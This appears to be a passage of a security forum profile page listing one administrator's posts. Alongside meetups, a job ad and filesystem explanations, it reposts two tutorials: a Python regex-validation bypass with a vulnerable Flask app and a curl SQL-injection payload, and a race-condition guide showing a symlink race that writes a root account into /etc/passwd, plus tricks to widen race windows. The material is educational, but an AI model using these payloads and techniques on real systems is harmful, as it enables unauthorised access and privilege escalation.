Jump to content

Nytro

Administrators
  • Posts

    18732
  • Joined

  • Last visited

  • Days Won

    709

Everything posted by Nytro

  1. tl;dr Sambata, 21 August, RST Meeting la Bucuresti! Sambata, 28 August, RST Meeting la Cluj! Salut, ma gandeam de mult timp la un astfel de meeting si cum ma astept ca sambata aceasta unii sa fie plecati din oras am zis ca sambata viitoare, 21 august, ar fi ideal de iesit la bere. Deci, cine vrea sa vina la bere sambata, 21 august? As prefera sa vina persoane "active", in sensul in care persoanele interesate care au cel putin 30 de posturi vor primi locatia prin mesaj privat (inca nu stiu unde, dar gasim noi ceva, sa vedem cati vom fi). Am rugamintea sa votati doar daca aveti in plan sa veniti. Anuntati prieteni de pe forum de eveniment ca sunt destui care nu mai activeaza pe forum (ii punem sa plateasca nota la final). De mentionat: - Daca e nevoie, puteti veni cu neveste/iubite, doar sa se astepte la baut, cuvinte urate, glume proaste si discutii de IT - Posibil ca pe 28 august sa facem un RST Meeting la Cluj
  2. Have you considered that in certain situations the way hackers exploit vulnerabilities over the network can be predictable? Anyone with access to encrypted traffic can reverse the logic behind the exploit and thus obtain the same data as the exploit. Various automated tools have been analyzed and it has been found that these tools operate in an unsafe way. Various exploit databases were analyzed and we learned that some of these are written in an insecure (predictable) way. This presentation will showcase the results of the research, including examples of exploits that once executed can be harmful. The data we obtain after exploitation can be accessible to other entities without the need of decrypting the traffic. The SSL/TLS specs will not change. There is a clear reason for that and in this presentation I will argue this, but what will change for sure is the way hackers will write some of the exploits.
      • 6
      • Upvote
  3. Salut, cautam un nou coleg. Avem nevoie de cineva care sa stie foarte bine (cu adevarat senior) partea de securitate web, dar sa aiba si experienta de architecture security reviews, Kubernetes / containers si ceva cloud. In plus e relevanta si partea de comunicare si interactiune cu oamenii. In principiu vrem sa fie din Bucuresti, nu stiu daca si Cluj e o posibilitate, dar pot intreba. Job description oficial: Your mission: You will develop and apply formal security-centric assessments against existing and in-development UiPath products. You might also participate in other activities such as architecture security reviews, training for development teams, or management of our bug bounty program. A successful Senior Penetration Tester at UiPath is a self-starter, with strong problem-solving skills. The ability to maneuver in a fast-paced environment is critical and handling ambiguity coupled with a deep grasp of various security threats. As a true owner of security in UiPath, great writing skills are needed, coupled with the ability to interact with stakeholders across multiple departments and teams. The Senior Penetration Tester acts as a mentor for technical peers and can transpose testing strategies and high-level non-technical language results. This Is What You'll Do At UiPath Penetration testing on products Security testing of desktop applications (Windows) Source code review (multiple programming languages) Cloud security reviews (Azure) Product architecture security reviews Recommendation of threat mitigations Security training and outreach to internal development teams Security guidance documentation Security tool development Security metrics delivery and improvements Assistance with recruiting activities This Is What You'll Bring To Our Team BS in Computer Science or related field, or equivalent work experience Minimum of 7 years of experience with penetration testing at application and infrastructure layer Minimum of 5 years of experience in working with developers, with personal skills in coding/scripting Good understanding of security tools and techniques Good knowledge of attacking services hosted in the cloud (Azure, AWS, GCP) Good knowledge of threat modeling Good knowledge of operating systems, network, and database security Advanced knowledge and understanding of web application security Experience writing POCs for discovered vulnerabilities Experience with Kubernetes and containers Experience using various penetration testing tools (i.e.: BurpSuite, Metasploit, etc.) Experience using debuggers, disassemblers for reverse engineering (Ida) Experience with Red Team exercises Experience with multiple programming languages Pentru aplicare: https://www.linkedin.com/jobs/view/2664874344/ Daca vreti imi puteti trimite PM cu CV-ul. De asemenea astept PM daca vreti sa stiti mai multe. PS: Cerintele sunt foarte stricte, vrem pe cineva care sa ne poata ajuta din prima zi cu proiectele.
      • 2
      • Upvote
  4. Da, booteaza de pe un Linux si foloseste comanda "dd". Dar e mai simplu sa citesti despre structurile de fisiere folosite. Sa zicem ca ai multe fisiere de cate 1GB pe disk. Sa zicem ca brut sunt fix unul dupa celalalt. Dar apoi stergi cate jumatate din fiecare. Asta inseamna ca ai bucati de 0,5 GB de fisier urmate de 0,5 GB de spatiu gol. Dar daca apoi vrei sa ma pui un fisier de 1 GB? O sa fie impartit in doua, in doua astfel de bucati libere. Cand accesezi fisierul va citi jumatate din prima locatie apoi jumatate din a doua. Nu e mult, dar daca il ai in 5000 de locatii timpul de citire creste. Nu am idee ce optimizari fac, dar e mai practic sa faci o defragmentare regulat decat sa dureze mult orice operatiune. Probabil in acele metadate de care vorbeam marimea fisierelor este memorata ca un numar pe 4 bytes (32 bits) ~ 4GB. E posibil sa fie si alte lucruri la mijloc, precum modul in care se fac citirile si scrierile. Nu stie, tu ii zici cat facand partitii. Da, se poate. In Windows dai click dreapta si Properties pe un fisier si o sa vezi "Size" - dimensiunea fisierului in sine si "Size on disk" - cat ocupa de fapt (se face aliniere la niste dimensiuni/blocuri de exemplu 4KB). Si asta e fara acele metadate. Din cate stiu eu nevoia de defragmentare vine de la HDD-urile clasice, care au un disc ce se invarte de exemplu la 7200 de rotatii pe minut si care e citit de catre "ceva". Faptul ca un fisier e in locatii diferite necesita ca acel "pin" (laser sau ce o fi) sa se mute in diferite locatii, fizic, ceea ce necesita timp si citirile/scrierile sunt vizibil mai lente. La SSD nu ai astfel de probleme, nu ai disc care se invarte si e irelevant unde scrii (desi are un microcontroller ce evita sa scrie prea des in aceleasi locuri, nu e relevant pentru sistemul de fisiere). Sper ca nu am zis balarii.
  5. Sistemul de fisiere e un fel de protocol care specifica cum sunt salvate fisierele. Sa presupunem ca tu ai un fisier "manele.txt" dar pe langa continutul acestui fisier trebuie pastrate si alte informatii: ce user l-a creat, cand a fost creat, cand a fost modificat ultima oara, ce dimensiune are si mai stiu eu ce. Gandeste-te la hard-disk/stick USB/CD/DVD ca un spatiu de stocare gol. Daca ai pune pe el doar niste date nu ar avea nici un sens, tu trebuie sa ai o structura de directoare cu fisiere si toate trebuie sa contina acele metadate de mai sus ca atunci cand sistemul de operare citeste brut acel disk sa inteleaga ce contine. De multe ori sistemele de fisiere au niste zone de metadate, care nu contin date, precum Master File Table. Adica un exemplu banal ar fi ca in primii x MB de pe disc sa fie un tabel de forma: Id fisier | ID folder parinte | Dimensiune | Owner | Last moditication date | Locatie date pe disk (offset) Sistemul de fisiere citeste acest tabel si intelege ce fisiere sunt acolo. Se foloseste de acel offset ca sa stie exact unde pe disc se afla continutul fisierului dar are si alte informatii despre fisier. Exemplul e banal, in practica sunt mult mai multe informatii necesare. Dar cam asta ar fi principiul de baza. Fiecare sistem de fisiere are avantaje si dezavantaje. Unele pot fi rapide dar atat. Altele pot avea fisiere de maxim 4GB. Altele pot fi optimizate pentru diverse lucruri. Altele nu necesita defragmentare dar sunt mai lente. Altele sunt prea complicate etc. Sunt multe lucruri care pot fi luate in considerare insa pentru un utilizator obisnuit nu sunt deloc relevante, sistemul de operare (sau utilitarele care implementeaza aceste sisteme de operare) se ocupa de tot ce e necesar si totul e transpare pentru user (aproape totul - vezi FAT32 cu fisiere de maxim 4GB).
  6. Nu prea ai ce sa faci daca functionalitatea programului nu permite activarea licentei. Poti incerca sa dai ceasul cu cativa ani inapoi dar sunt slabe sanse sa functioneze (ulterior il dai inapoi). O versiune mai noua a programului nu si-ar face treaba? Poate poti discuta cu producatorul sa iti dea una noua
  7. Daca vrei sa rulezi nu stiu ce bot de crypto, nu cred ca trebuie sa iti faci griji ca NSA-ul a pus ceva backdoor acolo, nu prea o sa ii pese daca nu esti cine stie ce persoana importanta la nivel mondial (e.g. directorul unei centrale nucelare din Iran). Ca sa o securizezi e destul de simplu: 1. Faci update cat se poate de des 2. Nu instalezi toate mizeriile 3. Scoti lucrurile de care nu ai nevoie, precum servicii pe care nu le foloseti 4. Lasi doar SSH, auth cu cheie si gata 5. Poti face multe lucruri de hardening dar nu prea ai nevoie Daca vrei, poti verifica o distributie de Linux si poti fi sigur ca nu are niciun backdoor, doar ca va dura cateva mii de ani: 1. Iei tot codul sursa si il compilezi 2. Face reproductible build daca se poate, daca nu faci diff-uri intre ce ai tu pe distributie si ce se compileaza 3. Verifici toate diferentele (o sa fie) datorate unor patch-uri, modificari sau configurari 4. Verifici tot codul sursa de la kernel la toate programele instalate si vezi sa nu aiba backdoor 5. Bonus: Cauti si vulnerabilitati cand faci asta Acum mai serios, nu prea ai ce face tu, o persoana, individual. Daca s-ar aduna cateva mii de persoane s-ar putea face asa ceva dar tot ar dura luni sau chiar ani (fara sa se faca vreo actualizare in acest timp). Cat despre distributia respectiva, nu am auzit de ea, de ce ai ales-o? De ce nu ceva "clasic": debian, centos, ubuntu, kali etc.?
  8. Registry Explorer Replacement for the Windows built-in Regedit.exe tool. Improvements over that tool include: Show real Registry (not just the standard one) Sort list view by any column Key icons for hives, inaccessible keys, and links Key details: last write time and number of keys/values Displays MUI and REG_EXPAND_SZ expanded values Full search (Find All / Ctrl+Shift+F) Enhanced hex editor for binary values Undo/redo Copy/paste of keys/values Optionally replace RegEdit more to come! Build instructions Build the solution file with Visual Studio 2022 preview. Can be built with Visual Studio 2019 as well (change toolset to v142). Sursa: https://github.com/zodiacon/RegExp
      • 1
      • Upvote
  9. A Python Regular Expression Bypass Technique One of the most common ways to check a user's input is to test it against a Regular Expression. The Python module RE provides easy and very powerful functions to check if a particular string matches a given regular expression (or if a given regular expression matches a particular string, which comes down to the same thing). Sometimes, functions included in Python RE are either misused or not very well understood by developers and when you see this it can be possible to bypass weak input validation functions. TL;DR using python re.match() function to validate a user input can lead to bypass because it will only match at the beginning of the string and not at the beginning of each line. So, by converting a payload to multiline, the second line will be ignored by the function. This means that a weak validation function that prevents using special characters in a value (for example id=123), could be bypassed with something like id=123\n'+OR+1=1--. In this article I'll show you an example of bad usage of the re.match() function. [from search() vs. match()] Python offers two different primitive operations based on regular expressions: re.match() checks for a match only at the beginning of the string, while re.search() checks for a match anywhere in the string (this is what Perl does by default). For example: 1 >>> 2 >>> re.match("c", "abcdef") # No match 3 >>> re.search("c", "abcdef") # Match 4 <re.Match object; span=(2, 3), match='c'> Regular expressions beginning with '^' can be used with search() to restrict the match at the beginning of the string: 1 >>> 2 >>> re.match("c", "abcdef") # No match 3 >>> re.search("^c", "abcdef") # No match 4 >>> re.search("^a", "abcdef") # Match 5 <re.Match object; span=(0, 1), match='a'> As you can see, the first re.match didn't match because implicit anchors. Anchors do not match any character at all. Instead, they match a position before, after, or between characters. They can be used to “anchor” the regex match at a certain position (https://www.regular-expressions.info/anchors.html). Input Validation using re.match() Let say that I've got a Python flask web application that is vulnerable to SQL Injection. If I send an HTTP request for /news sending an article id number on the id argument, and a category name on the argument category, it returns me the content of that article. For example: 1 from flask import Flask 2 from flask import request 3 import re 4 5 app = Flask(__name__) 6 7 def is_valid_input(input): 8 m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE) 9 if m is not None: 10 return False 11 return True 12 13 @app.route('/news', methods=['GET', 'POST']) 14 def news(): 15 if request.method == 'POST': 16 if "id" in request.form: 17 if "category" in request.form: 18 if is_valid_input(request.form["id"]) and is_valid_input(request.form["category"]): 19 return f"OK: {request.form['category']}/{request.form['id']}" 20 else: 21 return f"Invalid value: {request.form['category']}/{request.form['id']}", 403 22 else: 23 return "No category parameter sent." 24 else: 25 return "No id parameter sent." By sending a request with id=123 and category=financial the application reply me with "200 OK" status code and "OK: financial/123" response body. As I said, the argument id is vulnerable to SQL Injection, so the developer has fixed it by creating a function to validate the user's input on both arguments (id and category) that prevents sending some characters like single and double quotes or strings like "select" or "union". As you can see, this webapp checks the user's input with the is_valid_input function at line 7: 1 def is_valid_input(input): 2 m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE) 3 if m is not None: 4 return False 5 return True the code above means: "if the value of any input contains double quote, or single quote, or semicolon, or equal character, or any of the following string: "select", "union", "from", "where", then discard it". Let's try it: By trying to inject SQL syntax on the value of argument id the webapp returns a 403 Forbidden status with "Invalid value" as response body. This thanks to the validation function that matches invalid characters in my payload such as single quote and equal. Input Validation Bypass From the RE module documentation, about the re.match() function: "... even in MULTILINE mode, re.match() will only match at the beginning of the string and not at the beginning of each line. If you want to locate a match anywhere in string, use search() instead (see also search() vs. match())." So, to bypass this kind of input validation we just need to convert the SQL Injection payload from single line to multiline by adding a \n between the numeric value and the SQL syntax. For example: If the question is "can SQL have a newline inside a SELECT?" the answer is yes it can. The hypothetical SQL syntax becomes something like the following: Let's do it on the vulnerable webapp: As shown in the screenshot, I just put a \n (not CRLF \r\n) after the id value and then I started my SQL Injection. The validation function just validate the first line, so I bypassed it. Using curl: curl -s -d "id=123%0a'+OR+1=1--&category=test" 'http://localhost:5000/news' OK: test/123% Run it in your Lab First, download the vulnerable flask webapp source code from here: from flask import Flask from flask import request import re app = Flask(__name__) def is_valid_input(input😞 m = re.match(r'.*(["\';=]|select|union|from|where).*', input, re.IGNORECASE) if m is not None: return False return True @app.route('/news', methods=['GET', 'POST']) def news(): if request.method == 'POST': if "id" in request.form: if "category" in request.form: if is_valid_input(request.form["id"]) and is_valid_input(request.form["category"]): return f"OK: {request.form['category']}/{request.form['id']}" else: return f"Invalid value: {request.form['category']}/{request.form['id']}", 403 else: return "No category parameter sent." else: return "No id parameter sent." view rawapp.py hosted with ❤ by GitHub then start flask webserver with: flask run Remediation First option is to do a positive validation instead of a negative one. Don't create a sort of deny-list of "not allowed words" or "not allowed characters" but check for expected value format. Example id=123 can be validated by ^[0-9]+$. Second option is to use re.search() instead of re.match() that check over the whole value and not just for the first line. Third option: don't create your own input validation function but try to find a widly used and mantained library that does it for you. Follow if you liked this post, follow me on twitter to keep in touch! https://twitter.com/AndreaTheMiddle Sursa: https://www.secjuice.com/python-re-match-bypass-technique/
  10. Winning the race: Signals, symlinks, and TOC/TOU Date: 23rd Jun 2021Author: uid00 Comments Introduction: So, before we dive right into things, just a few bits of advice; some programming knowledge, an understanding of what symbolic linking is within *nix and how it works, and also an understanding of how multi-threading and signal handlers work would be beneficial for readers to understand the concepts I’m going to be covering here, but if you can’t code then don’t worry as I’m sure you’ll still be able to grasp the concepts that I’m covering. That being said, having prior programming knowledge should give you a deeper understanding of how this actually works. It won’t kill you to read up on the subjects I just mentioned, and by you doing so, you will understand this tutorial a lot easier. Ideally, if you understand C/C++ and Assembly language, then you should be able to pick up the concept of a practical (s/practical/exploitable) race condition bug relatively easily. Knowing your way around a debugger would also help. Not all race conditions are vulnerabilities, but many race conditions can lead to vulnerabilities taking place. That being said, when vulnerabilities do happen to arise as a result of race condition bugs, they can be extremely serious. There have been cases in the past where race condition flaws have affected national critical infrastructure, in one case even directly contributing to the deaths of multiple people (No Kidding!) Generally, within multi-threading, race conditions aren’t an issue in terms of exploitability but rather just an issue in terms of the intended program flow not going as planned (note ‘generally’, there can be exceptions where this can be used for exploitation rather than being a mere design issue). Anyway, before getting into specific kinds of race condition bugs, it should be noted that these bugs can exist in anything from a low-level Linux application to a multi-threaded relational DBMS implementation. In terms of paradigm, if your code is purely functional (I’m talking in terms of paradigm here, although I guess that particular use of terminology is interchangeable as if your code suffers from race condition flaws then it lacks functionality in the non-paradigm sense too) then race conditions will not occur. So, what exactly are race conditions? Let’s take a moment to sit back and enter the land of imagination. For the sake of this post, let’s pretend you’re not a fat nerd sitting in your Mom’s basement living off of beer and tendies while making sweet sweet love to your anime waifu pillow. Lets imagine, just for one moment, that you’re someone else. You’re not just any old someone, no. You’re someone who does something important. You’re a world-class athlete. You spent the last 4 years training non-stop for the 100m Sprint, you are certain you are going to win the Gold Medal this year. The time finally comes. you are ready to race. During the sprint, you’re neck-to-neck with Usain Bolt, both inches away from the finish line. By sheer chance, you both pass over the finish line at the exact same moment. The judges replay the footage in slow-motion to see who passed the finish line first, and unbelievably, you both passed the finish line at the exact same moment, down to the very nanosecond! Now the judges have a problem. Who wins Gold? You? Usain Bolt? The runner-up who crossed the line right after you two? What if nobody wins? What if you’re both given Gold, decreasing the subjective value of the medal? What if the judges call off the event entirely? What if they demand a re-match? What if a black hole suddenly spawns in the Olympic arena and causes the entire solar system to implode? Who the hell knows, right? Well, welcome to the wild and wacky world of race conditions! This is Part One of a Three-Part series diving into the subject of race conditions, there’s absolutely no way I can cover this whole subject in three blog posts. Try three books maybe! Race Conditions are a colossally huge subject with a wide variety of security implications ranging from weird behaviour that poses no risk at all, to crashing a server, to full-blown remote command execution! Due to the sheer size of this topic, I suggest doing research in your own time between reading each part of this tutorial series. While at first it might seem intimidating, this is actually a very simple concept to grasp (exploiting it on the other hand is a bit more hit and miss, but I’ll get into that later). Race conditions stem from novice developers making the assumption that their code will execute in a linear fashion, or as a result of developers implementing multi-threading in an insecure manner. If their program then attempts to perform two or more operations at the same time then this can cause changes within the code flow of the program to end with undesirable results (or desirable, depending on whether you’re asking the attacker or the victim!). It should also be noted (as stated before) that race conditions aren’t necessarily always a security risk, in some cases they can just cause unexpected behaviour within the program flow while leading to no actual risk. Race conditions can occur in many different contexts, even within basic electronics (and biology! Race Conditions have been observed within the brains of live rats). I will be covering race conditions from an exploitation standpoint, and I will mainly be talking about race conditions within web applications or within vulnerable C programs. The basic premise of a race condition bug is that two threads to “race” against eachother, allowing the winner of said race to manipulate the control flow of the vulnerable application. I’ll be touching lightly upon race conditions being present in multi-threaded applications and will give some brief examples, but this will mainly be focused on races as a result of signal handling, faulty access checks and symlink tricks. In addition to that, I’ll give some examples of how this class of bugs can be abused within Web applications. Race conditions cover such a broad spectrum that I simply cannot discuss all of it within one blog post, so I’ll give a quick overview of the basics, which hopefully you can build upon with your own research. To give you a more simple analogy of what a race condition is, imagine you have online banking with a banking platform. Let’s assume you open two separate browser tabs at once, both with the payment page loaded, you then setup both browser tabs so that you’re ready to make your payment to another bank account —  if you were to then click the button to make the payment in both tabs at identical times, it could register that only one payment had been made, when in reality the payment had been made twice but only the money for one of the payments has been deducted from your bank balance. This is a very basic analogy of how a race condition could take place, although this is highly unlikely to ever happen in a real world scenario. I’m going to demonstrate some code snippets to explain this, in order to show different kinds of races that are possible and give examples in various languages, but I’ll start pseudo-code : The code above is C-inspired pseudo-code The reason I gave the first example in C is because race conditions tend to be very common within vulnerable C applications. Specifically you should be looking for the signal.h header as this is generally a good indicator of a potential race condition bug being present within issues regarding signal handling at least). Another good indicator is if there are access checks present for files as this can often lead to symlink races taking place (I will demonstrate this shortly). I will give other examples in other languages, and explain context-specific race condition bugs associated with such languages. While this code above is clearly not a working example, it should allow me to illustrate the concept of race conditions. Lets assume an attacker sends two operations to the program at the same time, and the code flow states that if permitted, then execute the specified function. If timed correctly, an attacker could make it so that something is permitted at the time of check, but that thing may no longer be permitted at the time of use (this would be a TOC/TOU race — meaning “Time of Check / Time of Use”). So for example, we can assume that the following test is being ran: if (something_is_permitted) // check if permitted and the conditions for the if statement are met and the code flow will continue in the intended order, but when the function gets called, the thing that was not permitted is now considered to be permitted, so it will execute the following code: doThis(); This will result in unintended program flow and depending on the nature of the code it could allow an attacker to bypass access controls, escalate privileges, cause a denial of service, etc. The impact of race condition bugs can vary greatly, ranging from a petty nuisance to critical exploits resulting in the likes of remote root. I’ll begin by describing various types of race conditions and methods of triggering them, before moving on to some real-world examples of race conditions and an explanation of how they can be tested for within potentially vulnerable web applications. When most people think of Race Conditions, they imagine them to be something very fast-paced. People expect the timing required to execute a TOC/TOU race would need to be extremely precise. While this is often the case, it is not always the case. Consider the following example of a “slow-paced” race condition bug: There exists a social-networking application where users have the ability to edit their profile A user clicks the “edit profile” button and it opens up the webpage to allow them to make edits User then goes AFK (Away from Keyboard) The administrator finds an unrelated vulnerability in the profile editing section of the website, and as a result, locks down the edit functionality so that users can no longer edit their profile User returns, and still has the profile editing page open in a browser tab Despite new users not being able to access the “edit profile” page, this user already has the page opened and can continue to make edits despite the restriction put in place by the administrator Race Conditions can also take place as a result of latency within networks. Take an IRC for example, let’s assume that there is a hub and two linked nodes. Bob wants to register the channel #hax yet Alice also wants to register this same channel. Consider the following: Bob connects to IRC from node #1 Alice connects to the IRC from node #2 Bob runs /join #hax Alice runs /join #hax Both of these commands are ran from separate nodes at around the same time Bob becomes an operator of #hax Alice becomes an operator of #hax The reasoning for this, is, due to network latency, node #1 would not have time to send a signal to node #2 to alert it that the Services Daemon has already assigned operator status to another user on the same network. (PROTIP: When testing local desktop applications for Race Conditions - for example a compiled binary - use something like GDB or OllyDBG to set a breakpoint between TOC and TOU within the source code of the binary you are debugging. Execute your code from the breakpoint and take note of the results in order to determine any potential security risk or lack thereof. This is for confirmation of the bug only, and not for actual exploitation. As the saying goes, PoC||GTFO. This rings especially true with race conditions considering some of them are just bugs or glitches or whatever you wanna call them, as opposed to viable exploits with real attack value. If you cannot demonstrate impact, you probably should not report it) Symlinks and Flawed access checks: Using symlinks to trigger race conditions is a relatively common method. Here I will give a working example of this. The example will show how a symlink race can be used to exploit a badly implemented access check in C/C++ — this would allow an attacker to horizontally perform privilege escalation in order to get root on a server (assuming the server had a program that was vulnerable in this manner) — it should be noted that while writing to /etc/passwd in the manner I’m about to demonstrate will not work on newer operating systems, these methods can still be used to obtain read (or sometimes write) perms to root-owned files that generally would not be accessible from a regular user account. This method assumes that the program in question is being ran with setuid access rights. The intended purpose of the program is that it will check whether you have permissions to write to a specific directory (via an access(); check) — if you have permission, it will write your user input to the directory of choice. If you don’t have permission, then the access(); check is intended to fail, indicating that you’re attempting to write to a directory or file of which you lack the permissions to write to. For example, the /tmp directory is world-writeable, whereas a directory such as /etc would require additional permissions. The goal of an attacker here is to abuse symbolic linking to trick the program into thinking it is writing to /tmp where it has permission, when in fact it is writing to /etc where it lacks permissions In modern Linux Distributions (and in modern countermeasures implemented into languages such as C), there are ways of attempting to mitigate such an attack. For example, the POSIX C stdlib can use the mkstemp(); function as opposed to fwrite(); or fopen(); in order to create temporary files, and respectively mktemp(1) allows for creation of temporary files within *nix-based systems. Another attempt at mitigating this in *nix-based systems is the O_NOFOLLOW flag for open() calls — the purpose of this flag is to prevent files being opened by a symbolic link. Take a look at the following vulnerable code (this is a race condition between the original program and a malicious one which will be used): Example suid program vulnerable to a typical TOC/TOU symlink race condition through means of an insufficient access check. I will be compiling and running this from my user account with the following privs (non-root): First, I will demonstrate this using a debugger (GBD, although others such as OllyDbg will suffice too) because it allows you to pause the execution of the program allowing for race conditions to take place easier — in a real exploitation scenario you would need to trigger the race condition naturally which i will demonstrate next. First, disassemble the code using your debugger of choice: Now, set a breakpoint at fopen(); so we can demonstrate a race condition without actually having to go through the steps to trigger one naturally: break *0x80485ca Then replace the written file via a symbolic link like so: Now that you’ve paused the execution of the program flow through use of a breakpoint, resuming the program flow (after the symlink has been made) would cause the access check to be passed, meaning the program would continue to run as intended and would write some input to the file that would usually only be writeable had the access check been passed. Of course, using GDB or another debugger isn’t possible in real world scenarios, therefore it is relevant to implement something that will allow the race conditions to take place naturally (instead of setting a breakpoint and pausing the program execution with a debugger to get the timing right). One way of doing this is by repeatedly performing two options at the same time, until the race conditions are met. The following example will show how the access check in the vulnerable C program can be bypassed as a result of two bash scripts running simultaneously. Once the race condition is successfully met, it will result in the access check being passed and will write a new entry to /etc/passwd Script #1: This script should be running repeatedly until the condition is met, that’s why it is re-executing itself within the while loop Script #2: This script will repeatedly be attempting to make a symbolic link to /etc/passwd After a while of both of these script running at the same time, it should eventually get the timing correct so that the symbolic link is made prior to completion of the access check, causing the access check to be bypassed and some data to be written to a previously restricted file (/etc/passwd in this case) If all goes to plan, an attacker should be able to write a new entry to /etc/passwd with root privs: raceme:2PYyGlrrmNx5.:0:0::/root:/bin/sh From here, they can simply use ‘su’ in order to authenticate as a root user with the new ‘raceme’ account that they have created by adding an entry to /etc/passwd g0t r00t!! Race Conditions within Signal Handling: If you do not understand the concept of Signal Handlers within programming then now is probably a good time to become familiar with the subject, as it is one of the primary causes of race condition flaws. The most common occurrence of race conditions within Signal Handlers is when the same function installed as a signal handler is utilized for the handling of multiple different signals and when those different signals are called via the same signal handling function within a short time-frame of eachother (hence the race condition). “Non-Reentrant” Signals are the primary culprit that result in signal-based races posing an issue. If you’re unfamiliar with what the concept of non-reentrance is within Signal Handling, then I really do suggest reading into the topic in-depth, but if you’re like me and have a TL;DR attitude and just wanna go hack the planet already, then I will offer a short and sweet explanation (the terminology used to describe it alone is somewhat self-explanatory in all honesty). If a function has been installed with signal handling operations in mind, and if aforementioned function either maintains an internal state or calls another function that maintains an internal state then its a non-reentrant function and this means it has a higher probability of a race condition being a possibility. For an example demonstrating exploitability of race condition bugs associated with signal handlers, I will be using the free(); function (associated with dynamic memory allocation in C/C++) to trigger a traditional and well-known application-security flaw referred to as a “double free”. The following code examples shows how an attacker could craft a specifically timed payload – If you’re not spotting their common trend here, race conditions are all about timing. Generally attackers will have their payloads running concurrently in a for/while loop, or they’ll create a ghetto-style “loop” of sorts by having payload1.sh repeatedly execute payload2.sh which in turn will repeatedly execute payload1.sh and so on and so on. The reasoning for this is because in many contexts, for a race condition to be successful, the requests need to be made concurrently sometimes even down to the exact millisecond. Rather than executing their payload once and hoping they got their one-in-a-million chance of getting the timing exactly right it makes far more sense to use a loop to repeatedly execute the payload, as with each iteration of the loop, the attacker has another chance of getting the timing right. Pair this with methods of slowing down execution of certain processes and now the attacker has increased their window (the “window” in this instance referring to the viable time in which the race condition can occur, allowing the attack to be carried out). For example with a TOC/TOU Race, the “attack window” would be the time between the check taking place (hence “TOC” – “Time of Check”), and the timee when the action occurs (“TOU” – “Time of Use”) between the check being carried out again. The “attack window” in this instance is the time frame in which the check being carried out is saying that the actual occurring is permitted, which for a very short time period (or “window”) it is permitted… up until the iteration wherein the next check occurs, when the action is there no longer permitted meaning the window has closed. maximising the window in which the attack can be carried out by slowing down particular aspects of program/process execution (I cover methods of doing this in a chapter here) making as many concurrent attempts at triggering the race within the time-frame dictated by the length of your attack window. Use multiple threads where possible. Testing manually with a debugger via setting breakpoint between TOC and TOU Having lots of processing power available to make as many concurrent requests as possible during your attack window (while using the methods I describe to slow down other elements of process execution at the same time) Below you can find an example of a Race Condition present via signal handling, with triggering of a double free as a Proof-of-Concept. This code example uses the same signal handler function which is non-reentrant and makes use of a shared state. The function in question is the free(); function, and in this code example an attacker could send two different signals to the same signal handler at the same time, resulting in memory corruption taking place as a direct result of the race condition itself. If you have experience with C/C++ and dynamic memory allocation then you’re probably aware of the issues posed by a double free triggered as a result of calling free(); twice with the same argument. For those who are not aware, this is known as a “double free bug” and it results in the programs memory structures becoming corrupted which can cause a multitude of problems ranging from segfaults and crashes, to arbitrary code execution as a result of the attacker being able to control the data written into the memory region that has been doubly-allocated, resulting in a buffer overflow taking place. While the RCE triggered by the overflow which in turn was triggered by the double free… the double free itself is triggered as a restult of a race condition occuring due to two separate signals being sent to the free(); signal handler, which, withou getting overly technical, essentially makes malloc(); throw a hissy-fit and poop its pants. The following code demonstrates this issue: #include <stdio.h> #include <vulnerable.lol> #define RACE_CONDITION LOL void vuln(int pwn) { // some lame program free(globvar); free(globvar2); // double free } int main(int argc,char* argv[]) { // overflowz and code exec signal(SIGHUP,vuln); signal(SIGTERM,vuln); // all due to a pesky race condition } There are a number of reasons why signal handling can result in race conditions, although using the same function as a handler for two or more separate signals is one of the primary culprits. Here is a list of reasons as to what could trigger a race condition via signal handling (from Mitre’s CWE Database): Shared state (e.g. global data or static variables) that are accessible to both a signal handler and “regular” code Shared state between a signal handler and other signal handlers Use of non-reentrant functionality within a signal handler – which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution. Association of the same signal handler function with multiple signals – which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses. Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality While not technically a race condition, some signal handlers are designed to be called at most once, and being called more than once can introduce security problems, even when there are not any concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses. Out of everything just listed, the most common reasons are either one signal handler is being used for multiple signals, or two or more signals arrive in short enough succession of eachother to fit the attack window for a TOCTOU race condition. Methods of slowing down process execution: Slowing down the execution process of the program is almost vital to effectively achieve race conditions more consistently, here I will describe somethe common methods that can be used to achieve this. Some of these methods are outdated and will only work on older sytems, but they are still worth including (especially if you’re into CTF’s) Deep symlink nesting (as described above) is one old method that can be used to slow down program execution in order to aid race conditions. Another method that can be used is by changing the values for the environment variable LD_DEBUG — setting this to a different value will result in output being sent to stderr, if you were to then redirect stderr to a pipe, it can slow down or completely halt the setuid bin in question. To do this you would do something as follows: LD_DEBUG=all;some_program 2>&1 Usage of LD_DEBUG is somewhat outdated, no longer relevant within setuid binaries since the upgrade to glibc 2.3.4 — that being said, this can still be used for some more esoteric bugs affecting legacy systems, and is also occasionally seen as solutions for CTF’s Another method of slowing down program execution is by lowering its scheduling priority through use of the nice or renice commands. Technically, this isn’t slowing down the program execution as such, but it’s rather forcing the Linux scheduler to allocate less time frames towards the execution of the program, resulting in it running at a slower rate. It should also be noted that this can be achieved within code (rather than as a terminal command) through use of the nice(); syscall. If the value for nice is a negative value, then the process will run with higher priority. If it is a positive value, then the process will run with lower priority. For example, setting the following value will cause the process to run at a ridiculously slow rate: nice(19) If you’re familiar with writing Linux rootkits, then you may already be aware of these methods, but you can use dynamic linker tricks via LD_PRELOAD in order to slow down the execution of processes too. This can be done by hooking common functions such as malloc(); or free(); then once said functions are called within the vulnerable program, their speed of execution will be slowed down to a nominal extent. One extremely trivial way of slowing down the execution of a program is to simply run it within a virtualized environment. If you’re using a virtual machine, then there should be options available that will allow you to limit the allocated amount of CPU resources and RAM, allowing you to test the potentially vulnerable program in a more controlled environment where you can slow things down with ease and with a lot of control. This method will only work while testing for certain classes of race conditions. One crude method to slow down program/process executioon speeds in order to increase the chance of a race condition occuring is taking physical measures to overheat your computer, putting strain on its ability to perform computational tasks. Obviously, this is dangerous for the health of your device so don’t come crying to me if you wind up breaking your computer. There are many ways to do this, but the way I’ve seen it done (which is, according to my crazy IRL hacker friend) is supposedly one of the safer methods of physically overheating your computer — simply 